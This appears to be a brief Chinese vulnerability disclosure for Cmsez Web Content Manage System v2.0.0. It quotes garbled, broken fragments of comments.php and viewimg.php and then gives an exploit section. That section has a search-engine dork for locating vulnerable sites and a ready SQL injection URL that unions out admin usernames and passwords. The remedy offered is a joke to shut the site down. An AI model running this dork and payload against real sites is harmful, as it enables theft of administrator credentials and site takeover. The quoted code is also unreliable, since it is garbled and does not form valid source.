程序名称:Cmsez Web Content Manage System v2.0.0
漏洞发现:小帥(小帅)
公布时间:08-03-14
漏洞影响:严重
漏洞文件:comments.php viewimg.php
官方站点:http://www.cmsez.com/
漏洞代码:
---------------
<?
//comments
include "mainfile.php";
$art=new article();
//设定
function comment(id)
{
var page = \"".PLUS_URL."/comments.php?id=\" + id ;
popwin = window.open(page,\"\",\"width=460,height=500,scrollbars,resizable\")
popwin.focus();
}
document.open();
document.write(\"<a href=\\\"javascript:comment(’$id’)\\\" title=\\\""._LANG_0930."\\\">"._LANG_0931." $showNum "._LANG_0932."</a>\");
document.close();";
break;
case "saveComment":
--------------
viewimg.php
--------------
<?
//image.php 显示附件的图片
include "mainfile.php";
$user_info[user_level]=="Guest" && $confirm==true){
include "modules/member/index.php";
}else{
sql="select id from $imgdb where aid=$aid order by id ";
---------------------
exp:
allinurl:"owered by CMSEZ" comments.php inurlowered by CMSEZ
http://localhost/comments.php?id=1111111111111/**/union/**/1,concat(name,0x3a,pass),2,3,4/**/from/**/admin/*
-------------------
修复方案:
最好把站关了...
|
